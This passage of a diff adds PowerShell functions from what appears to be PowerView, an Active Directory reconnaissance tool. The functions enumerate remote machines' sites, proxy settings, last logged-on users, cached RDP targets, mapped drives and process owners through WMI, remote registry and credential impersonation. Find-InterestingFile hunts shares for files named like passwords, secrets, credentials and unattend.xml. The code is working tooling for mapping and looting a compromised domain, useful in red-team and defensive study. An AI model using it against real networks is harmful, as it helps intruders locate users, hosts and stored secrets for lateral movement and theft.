+ +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +.DESCRIPTION + +This function will use the DsGetSiteName Win32API call to look up the +name of the site where a specified computer resides. + +.PARAMETER ComputerName + +Specifies the hostname to check the site for (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +.EXAMPLE + +Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local + +Returns the site for WINDOWS1.testlab.local. + +.EXAMPLE + +Get-DomainComputer | Get-NetComputerSiteName + +Returns the sites for every machine in AD. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred + +.OUTPUTS + +PowerView.ComputerSite + +A PSCustomObject containing the ComputerName, IPAddress, and associated Site name. 
+#> + + [OutputType('PowerView.ComputerSite')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + # if we get an IP address, try to resolve the IP to a hostname + if ($Computer -match '^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$') { + $IPAddress = $Computer + $Computer = [System.Net.Dns]::GetHostByAddress($Computer) | Select-Object -ExpandProperty HostName + } + else { + $IPAddress = @(Resolve-IPAddress -ComputerName $Computer)[0].IPAddress + } + + $PtrInfo = [IntPtr]::Zero + + $Result = $Netapi32::DsGetSiteName($Computer, [ref]$PtrInfo) + + $ComputerSite = New-Object PSObject + $ComputerSite | Add-Member Noteproperty 'ComputerName' $Computer + $ComputerSite | Add-Member Noteproperty 'IPAddress' $IPAddress + + if ($Result -eq 0) { + $Sitename = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($PtrInfo) + $ComputerSite | Add-Member Noteproperty 'SiteName' $Sitename + } + else { + Write-Verbose "[Get-NetComputerSiteName] Error: $(([ComponentModel.Win32Exception] $Result).Message)" + $ComputerSite | Add-Member Noteproperty 'SiteName' '' + } + $ComputerSite.PSObject.TypeNames.Insert(0, 'PowerView.ComputerSite') + + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + + $ComputerSite + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-WMIRegProxy { +<# +.SYNOPSIS + +Enumerates the proxy server and WPAD conents for the current user. 
+ +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Enumerates the proxy server and WPAD specification for the current user +on the local machine (default), or a machine specified with -ComputerName. +It does this by enumerating settings from +HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings. + +.PARAMETER ComputerName + +Specifies the system to enumerate proxy settings on. Defaults to the local host. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connecting to the remote system. + +.EXAMPLE + +Get-WMIRegProxy + +ComputerName ProxyServer AutoConfigURL Wpad +------------ ----------- ------------- ---- +WINDOWS1 http://primary.test... + +.EXAMPLE + +$Cred = Get-Credential "TESTLAB\administrator" +Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local + +ComputerName ProxyServer AutoConfigURL Wpad +------------ ----------- ------------- ---- +windows1.testlab.local primary.testlab.local + +.INPUTS + +String + +Accepts one or more computer name specification strings on the pipeline (netbios or FQDN). + +.OUTPUTS + +PowerView.ProxySettings + +Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents. 
+#> + + [OutputType('PowerView.ProxySettings')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = $Env:COMPUTERNAME, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + ForEach ($Computer in $ComputerName) { + try { + $WmiArguments = @{ + 'List' = $True + 'Class' = 'StdRegProv' + 'Namespace' = 'root\default' + 'Computername' = $Computer + 'ErrorAction' = 'Stop' + } + if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential } + + $RegProvider = Get-WmiObject @WmiArguments + $Key = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings' + + # HKEY_CURRENT_USER + $HKCU = 2147483649 + $ProxyServer = $RegProvider.GetStringValue($HKCU, $Key, 'ProxyServer').sValue + $AutoConfigURL = $RegProvider.GetStringValue($HKCU, $Key, 'AutoConfigURL').sValue + + $Wpad = '' + if ($AutoConfigURL -and ($AutoConfigURL -ne '')) { + try { + $Wpad = (New-Object Net.WebClient).DownloadString($AutoConfigURL) + } + catch { + Write-Warning "[Get-WMIRegProxy] Error connecting to AutoConfigURL : $AutoConfigURL" + } + } + + if ($ProxyServer -or $AutoConfigUrl) { + $Out = New-Object PSObject + $Out | Add-Member Noteproperty 'ComputerName' $Computer + $Out | Add-Member Noteproperty 'ProxyServer' $ProxyServer + $Out | Add-Member Noteproperty 'AutoConfigURL' $AutoConfigURL + $Out | Add-Member Noteproperty 'Wpad' $Wpad + $Out.PSObject.TypeNames.Insert(0, 'PowerView.ProxySettings') + $Out + } + else { + Write-Warning "[Get-WMIRegProxy] No proxy settings found for $ComputerName" + } + } + catch { + Write-Warning "[Get-WMIRegProxy] Error enumerating proxy settings for $ComputerName : $_" + } + } + } +} + + +function Get-WMIRegLastLoggedOn { +<# +.SYNOPSIS + +Returns the last user who 
logged onto the local (or a remote) machine. + +Note: This function requires administrative rights on the machine you're enumerating. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +This function uses remote registry to enumerate the LastLoggedOnUser registry key +for the local (or remote) machine. + +.PARAMETER ComputerName + +Specifies the hostname to query for remote registry values (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connecting to the remote system. + +.EXAMPLE + +Get-WMIRegLastLoggedOn + +Returns the last user logged onto the local machine. + +.EXAMPLE + +Get-WMIRegLastLoggedOn -ComputerName WINDOWS1 + +Returns the last user logged onto WINDOWS1 + +.EXAMPLE + +Get-DomainComputer | Get-WMIRegLastLoggedOn + +Returns the last user logged onto all machines in the domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred + +.OUTPUTS + +PowerView.LastLoggedOnUser + +A PSCustomObject containing the ComputerName and last loggedon user. 
+#>
+
+ [OutputType('PowerView.LastLoggedOnUser')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $ComputerName = 'localhost',
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ # HKEY_LOCAL_MACHINE
+ $HKLM = 2147483650
+
+ $WmiArguments = @{
+ 'List' = $True
+ 'Class' = 'StdRegProv'
+ 'Namespace' = 'root\default'
+ 'Computername' = $Computer
+ 'ErrorAction' = 'SilentlyContinue'
+ }
+ if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
+
+ # try to open up the remote registry key to grab the last logged on user
+ try {
+ $Reg = Get-WmiObject @WmiArguments
+
+ $Key = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI'
+ $Value = 'LastLoggedOnUser'
+ $LastUser = $Reg.GetStringValue($HKLM, $Key, $Value).sValue
+
+ $LastLoggedOn = New-Object PSObject
+ $LastLoggedOn | Add-Member Noteproperty 'ComputerName' $Computer
+ $LastLoggedOn | Add-Member Noteproperty 'LastLoggedOn' $LastUser
+ $LastLoggedOn.PSObject.TypeNames.Insert(0, 'PowerView.LastLoggedOnUser')
+ $LastLoggedOn
+ }
+ catch {
+ Write-Warning "[Get-WMIRegLastLoggedOn] Error opening remote registry on $Computer. Remote registry likely not enabled."
+ }
+ }
+ }
+}
+
+
+function Get-WMIRegCachedRDPConnection {
+<#
+.SYNOPSIS
+
+Returns information about RDP connections outgoing from the local (or remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: ConvertFrom-SID
+
+.DESCRIPTION
+
+Uses remote registry functionality to query all entries for the
+"Windows Remote Desktop Connection Client" on a machine, separated by
+user and target server.
+
+.PARAMETER ComputerName
+
+Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
+Defaults to 'localhost'.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connecting to the remote system.
+
+.EXAMPLE
+
+Get-WMIRegCachedRDPConnection
+
+Returns the RDP connection client information for the local machine.
+
+.EXAMPLE
+
+Get-WMIRegCachedRDPConnection -ComputerName WINDOWS2.testlab.local
+
+Returns the RDP connection client information for the WINDOWS2.testlab.local machine
+
+.EXAMPLE
+
+Get-DomainComputer | Get-WMIRegCachedRDPConnection
+
+Returns cached RDP information for all machines in the domain.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+.OUTPUTS
+
+PowerView.CachedRDPConnection
+
+A PSCustomObject containing the ComputerName and cached RDP information.
+#>
+
+ [OutputType('PowerView.CachedRDPConnection')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $ComputerName = 'localhost',
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ # HKEY_USERS
+ $HKU = 2147483651
+
+ $WmiArguments = @{
+ 'List' = $True
+ 'Class' = 'StdRegProv'
+ 'Namespace' = 'root\default'
+ 'Computername' = $Computer
+ 'ErrorAction' = 'Stop'
+ }
+ if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
+
+ try {
+ $Reg = Get-WmiObject @WmiArguments
+
+ # extract out the SIDs of domain users in this hive
+ $UserSIDs = ($Reg.EnumKey($HKU, '')).sNames | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
+
+ ForEach ($UserSID in $UserSIDs) {
+ try {
+ if ($PSBoundParameters['Credential']) {
+ $UserName = ConvertFrom-SID -ObjectSid $UserSID -Credential $Credential
+ }
+ else {
+ $UserName = ConvertFrom-SID -ObjectSid $UserSID
+ }
+
+ # pull out all the cached RDP connections
+ $ConnectionKeys = $Reg.EnumValues($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Default").sNames
+
+ ForEach ($Connection in $ConnectionKeys) {
+ # make sure this key is a cached connection
+ if ($Connection -match 'MRU.*') {
+ $TargetServer = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Default", $Connection).sValue
+
+ $FoundConnection = New-Object PSObject
+ $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer
+ $FoundConnection | Add-Member Noteproperty 'UserName' $UserName
+ $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID
+ $FoundConnection | Add-Member Noteproperty 'TargetServer' $TargetServer
+ $FoundConnection | Add-Member Noteproperty 'UsernameHint' $Null
+ $FoundConnection.PSObject.TypeNames.Insert(0, 'PowerView.CachedRDPConnection')
+ $FoundConnection
+ }
+ }
+
+ # pull out all the cached server info with username hints
+ $ServerKeys = $Reg.EnumKey($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Servers").sNames
+
+ ForEach ($Server in $ServerKeys) {
+
+ $UsernameHint = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Servers\$Server", 'UsernameHint').sValue
+
+ $FoundConnection = New-Object PSObject
+ $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer
+ $FoundConnection | Add-Member Noteproperty 'UserName' $UserName
+ $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID
+ $FoundConnection | Add-Member Noteproperty 'TargetServer' $Server
+ $FoundConnection | Add-Member Noteproperty 'UsernameHint' $UsernameHint
+ $FoundConnection.PSObject.TypeNames.Insert(0, 'PowerView.CachedRDPConnection')
+ $FoundConnection
+ }
+ }
+ catch {
+ Write-Verbose "[Get-WMIRegCachedRDPConnection] Error: $_"
+ }
+ }
+ }
+ catch {
+ Write-Warning "[Get-WMIRegCachedRDPConnection] Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_"
+ }
+ }
+ }
+}
+
+
+function Get-WMIRegMountedDrive {
+<#
+.SYNOPSIS
+
+Returns information about saved network mounted drives for the local (or remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: ConvertFrom-SID
+
+.DESCRIPTION
+
+Uses remote registry functionality to enumerate recently mounted network drives.
+
+.PARAMETER ComputerName
+
+Specifies the hostname to query for mounted drive information (also accepts IP addresses).
+Defaults to 'localhost'.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connecting to the remote system.
+
+.EXAMPLE
+
+Get-WMIRegMountedDrive
+
+Returns the saved network mounted drives for the local machine.
+
+.EXAMPLE
+
+Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local
+
+Returns the saved network mounted drives for the WINDOWS2.testlab.local machine
+
+.EXAMPLE
+
+Get-DomainComputer | Get-WMIRegMountedDrive
+
+Returns the saved network mounted drives for all machines in the domain.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+.OUTPUTS
+
+PowerView.RegMountedDrive
+
+A PSCustomObject containing the ComputerName and mounted drive information.
+#>
+
+ [OutputType('PowerView.RegMountedDrive')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $ComputerName = 'localhost',
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ # HKEY_USERS
+ $HKU = 2147483651
+
+ $WmiArguments = @{
+ 'List' = $True
+ 'Class' = 'StdRegProv'
+ 'Namespace' = 'root\default'
+ 'Computername' = $Computer
+ 'ErrorAction' = 'Stop'
+ }
+ if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
+
+ try {
+ $Reg = Get-WmiObject @WmiArguments
+
+ # extract out the SIDs of domain users in this hive
+ $UserSIDs = ($Reg.EnumKey($HKU, '')).sNames | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
+
+ ForEach ($UserSID in $UserSIDs) {
+ try {
+ if ($PSBoundParameters['Credential']) {
+ $UserName = ConvertFrom-SID -ObjectSid $UserSID -Credential $Credential
+ }
+ else {
+ $UserName = ConvertFrom-SID -ObjectSid $UserSID
+ }
+
+ $DriveLetters = ($Reg.EnumKey($HKU, "$UserSID\Network")).sNames
+
+ ForEach ($DriveLetter in $DriveLetters) {
+ $ProviderName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'ProviderName').sValue
+ $RemotePath = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'RemotePath').sValue
+ $DriveUserName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'UserName').sValue
+ if (-not $UserName) { $UserName = '' }
+
+ if ($RemotePath -and ($RemotePath -ne '')) {
+ $MountedDrive = New-Object PSObject
+ $MountedDrive | Add-Member Noteproperty 'ComputerName' $Computer
+ $MountedDrive | Add-Member Noteproperty 'UserName' $UserName
+ $MountedDrive | Add-Member Noteproperty 'UserSID' $UserSID
+ $MountedDrive | Add-Member Noteproperty 'DriveLetter' $DriveLetter
+ $MountedDrive | Add-Member Noteproperty 'ProviderName' $ProviderName
+ $MountedDrive | Add-Member Noteproperty 'RemotePath' $RemotePath
+ $MountedDrive | Add-Member Noteproperty 'DriveUserName' $DriveUserName
+ $MountedDrive.PSObject.TypeNames.Insert(0, 'PowerView.RegMountedDrive')
+ $MountedDrive
+ }
+ }
+ }
+ catch {
+ Write-Verbose "[Get-WMIRegMountedDrive] Error: $_"
+ }
+ }
+ }
+ catch {
+ Write-Warning "[Get-WMIRegMountedDrive] Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_"
+ }
+ }
+ }
+}
+
+
+function Get-WMIProcess {
+<#
+.SYNOPSIS
+
+Returns a list of processes and their owners on the local or remote machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+.DESCRIPTION
+
+Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine,
+including the owners of the particular process.
+
+.PARAMETER ComputerName
+
+Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
+Defaults to 'localhost'.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system.
+
+.EXAMPLE
+
+Get-WMIProcess -ComputerName WINDOWS1
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+.OUTPUTS
+
+PowerView.UserProcess
+
+A PSCustomObject containing the remote process information.
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.UserProcess')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $ComputerName = 'localhost',
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ PROCESS {
+ ForEach ($Computer in $ComputerName) {
+ try {
+ $WmiArguments = @{
+ 'ComputerName' = $ComputerName
+ 'Class' = 'Win32_process'
+ }
+ if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
+ Get-WMIobject @WmiArguments | ForEach-Object {
+ $Owner = $_.getowner();
+ $Process = New-Object PSObject
+ $Process | Add-Member Noteproperty 'ComputerName' $Computer
+ $Process | Add-Member Noteproperty 'ProcessName' $_.ProcessName
+ $Process | Add-Member Noteproperty 'ProcessID' $_.ProcessID
+ $Process | Add-Member Noteproperty 'Domain' $Owner.Domain
+ $Process | Add-Member Noteproperty 'User' $Owner.User
+ $Process.PSObject.TypeNames.Insert(0, 'PowerView.UserProcess')
+ $Process
+ }
+ }
+ catch {
+ Write-Verbose "[Get-WMIProcess] Error enumerating remote processes on '$Computer', access likely denied: $_"
+ }
+ }
+ }
+}
+
+
+function Find-InterestingFile {
+<#
+.SYNOPSIS
+
+Searches for files on the given path that match a series of specified criteria.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection
+
+.DESCRIPTION
+
+This function recursively searches a given UNC path for files with
+specific keywords in the name (default of pass, sensitive, secret, admin,
+login and unattend*.xml). By default, hidden files/folders are included
+in search results. If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection
+is used to temporarily map the remote share.
+
+.PARAMETER Path
+
+UNC/local path to recursively search.
+
+.PARAMETER Include
+
+Only return files/folders that match the specified array of strings,
+i.e. @(*.doc*, *.xls*, *.ppt*)
+
+.PARAMETER LastAccessTime
+
+Only return files with a LastAccessTime greater than this date value.
+
+.PARAMETER LastWriteTime
+
+Only return files with a LastWriteTime greater than this date value.
+
+.PARAMETER CreationTime
+
+Only return files with a CreationTime greater than this date value.
+
+.PARAMETER OfficeDocs
+
+Switch. Search for office documents (*.doc*, *.xls*, *.ppt*)
+
+.PARAMETER FreshEXEs
+
+Switch. Find .EXEs accessed within the last 7 days.
+
+.PARAMETER ExcludeFolders
+
+Switch. Exclude folders from the search results.
+
+.PARAMETER ExcludeHidden
+
+Switch. Exclude hidden files and folders from the search results.
+
+.PARAMETER CheckWriteAccess
+
+Switch. Only returns files the current user has write access to.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+to connect to remote systems for file enumeration.
+
+.EXAMPLE
+
+Find-InterestingFile -Path "C:\Backup\"
+
+Returns any files on the local path C:\Backup\ that have the default
+search term set in the title.
+
+.EXAMPLE
+
+Find-InterestingFile -Path "\\WINDOWS7\Users\" -LastAccessTime (Get-Date).AddDays(-7)
+
+Returns any files on the remote path \\WINDOWS7\Users\ that have the default
+search term set in the title and were accessed within the last week.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-InterestingFile -Credential $Cred -Path "\\PRIMARY.testlab.local\C$\Temp\"
+
+.OUTPUTS
+
+PowerView.FoundFile
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.FoundFile')]
+ [CmdletBinding(DefaultParameterSetName = 'FileSpecification')]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Path = '.\',
+
+ [Parameter(ParameterSetName = 'FileSpecification')]
+ [ValidateNotNullOrEmpty()]
+ [Alias('SearchTerms', 'Terms')]
+ [String[]]
+ $Include = @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config'),
+
+ [Parameter(ParameterSetName = 'FileSpecification')]
+ [ValidateNotNullOrEmpty()]
+ [DateTime]
+ $LastAccessTime,
+
+ [Parameter(ParameterSetName = 'FileSpecification')]
+ [ValidateNotNullOrEmpty()]
+ [DateTime]
+ $LastWriteTime,
+
+ [Parameter(ParameterSetName = 'FileSpecification')]
+ [ValidateNotNullOrEmpty()]
+ [DateTime]
+ $CreationTime,
+
+ [Parameter(ParameterSetName = 'OfficeDocs')]
+ [Switch]
+ $OfficeDocs,
+
+ [Parameter(ParameterSetName = 'FreshEXEs')]
+ [Switch]
+ $FreshEXEs,
+
+ [Parameter(ParameterSetName = 'FileSpecification')]
+ [Switch]
+ $ExcludeFolders,
+
+ [Parameter(ParameterSetName = 'FileSpecification')]
+ [Switch]
+ $ExcludeHidden,
+
+ [Switch]
+ $CheckWriteAccess,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ $SearcherArguments = @{
+ 'Recurse' = $True
+ 'ErrorAction' = 'SilentlyContinue'
+ 'Include' = $Include
+ }
+ if ($PSBoundParameters['OfficeDocs']) {
+ $SearcherArguments['Include'] = @('*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt', '*.pptx')
+ }
+ elseif ($PSBoundParameters['FreshEXEs']) {
+ # find .exe's accessed within the last 7 days
+ $LastAccessTime = (Get-Date).AddDays(-7).ToString('MM/dd/yyyy')
+ $SearcherArguments['Include'] = @('*.exe')
+ }
+ $SearcherArguments['Force'] = -not $PSBoundParameters['ExcludeHidden']
+
+ $MappedComputers = @{}
+
+ function Test-Write {
+ # short helper to check is the current user can write to a file
+ [CmdletBinding()]Param([String]$Path)
+ try {
+ $Filetest = [IO.File]::OpenWrite($Path)
+ $Filetest.Close()
+ $True
+ }
+ catch {
+ $False
+ }
+ }
+ }
+
+ PROCESS {
+ ForEach ($TargetPath in $Path) {
+ if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
+ $HostComputer = (New-Object System.Uri($TargetPath)).Host
+ if (-not $MappedComputers[$HostComputer]) {
+ # map IPC$ to this computer if it's not already
+ Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential
+ $MappedComputers[$HostComputer] = $True
+ }
+ }
+
+ $SearcherArguments['Path'] = $TargetPath
+ Get-ChildItem @SearcherArguments | ForEach-Object {
+ # check if we're excluding folders
+ $Continue = $True
+ if ($PSBoundParameters['ExcludeFolders'] -and ($_.PSIsContainer)) {
+ Write-Verbose "Excluding: $($_.FullName)"
+ $Continue = $False
+ }
+ if ($LastAccessTime -and ($_.LastAccessTime -lt $LastAccessTime)) {
+ $Continue = $False
+ }
+ if ($PSBoundParameters['LastWriteTime'] -and ($_.LastWriteTime -lt $LastWriteTime)) {
+ $Continue = $False
+ }
+ if ($PSBoundParameters['CreationTime'] -and ($_.CreationTime -lt $CreationTime)) {
+ $Continue = $False
+ }
+ if ($PSBoundParameters['CheckWriteAccess'] -and (-not (Test-Write -Path $_.FullName))) {
+ $Continue = $False
+ }
+ if ($Continue) {
+ $FileParams = @{
+ 'Path' = $_.FullName
+ 'Owner' = $((Get-Acl $_.FullName).Owner)
+ 'LastAccessTime' = $_.LastAccessTime
+ 'LastWriteTime' = $_.LastWriteTime
+ 'CreationTime' = $_.CreationTime
+ 'Length' = $_.Length
+ }
+ $FoundFile = New-Object -TypeName PSObject -Property $FileParams
+ $FoundFile.PSObject.TypeNames.Insert(0, 'PowerView.FoundFile')
+ $FoundFile
+ }
+ }
+ }
+ }
+
+ END {
+ # remove the IPC$ mappings
+ $MappedComputers.Keys | Remove-RemoteConnection
+ }
+}
+
+
+########################################################
+#
+# 'Meta'-functions start below
+#
+########################################################
+
+function New-ThreadedFunction {
+ # Helper used by any threaded host enumeration functions
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [String[]]
+ $ComputerName,
+
+ [Parameter(Position = 1, Mandatory = $True)]
+ [System.Management.Automation.ScriptBlock]
+ $ScriptBlock,
+
+ [Parameter(Position = 2)]
+ [Hashtable]
+ $ScriptParameters,
+
+ [Int]
+ [ValidateRange(1, 100)]
+ $Threads = 20,
+
+ [Switch]
+ $NoImports
+ )
+
+ BEGIN {
+ # Adapted from:
+ # http://powershell.org/wp/forums/topic/invpke-parallel-need-help-to-clone-the-current-runspace/
+ $SessionState = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
+
+ # # $SessionState.ApartmentState = [System.Threading.Thread]::CurrentThread.GetApartmentState()
+ # force a single-threaded apartment state (for token-impersonation stuffz)
+ $SessionState.ApartmentState = [System.Threading.ApartmentState]::STA
+
+ # import the current session state's variables and functions so the chained PowerView
+ # functionality can be used by the threaded blocks
+ if (-not $NoImports) {
+ # grab all the current variables for this runspace
+ $MyVars = Get-Variable -Scope 2
+
+ # these Variables are added by Runspace.Open() Method and produce Stop errors if you add them twice
+ $VorbiddenVars = @('?','args','ConsoleFileName','Error','ExecutionContext','false','HOME','Host','input','InputObject','MaximumAliasCount','MaximumDriveCount','MaximumErrorCount','MaximumFunctionCount','MaximumHistoryCount','MaximumVariableCount','MyInvocation','null','PID','PSBoundParameters','PSCommandPath','PSCulture','PSDefaultParameterValues','PSHOME','PSScriptRoot','PSUICulture','PSVersionTable','PWD','ShellId','SynchronizedHash','true')
+
+ # add Variables from Parent Scope (current runspace) into the InitialSessionState
+ ForEach ($Var in $MyVars) {
+ if ($VorbiddenVars -NotContains $Var.Name) {
+ $SessionState.Variables.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Var.name,$Var.Value,$Var.description,$Var.options,$Var.attributes))
+ }
+ }
+
+ # add Functions from current runspace to the InitialSessionState
+ ForEach ($Function in (Get-ChildItem Function:)) {
+ $SessionState.Commands.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList $Function.Name, $Function.Definition))
+ }
+ }
+
+ # threading adapted from
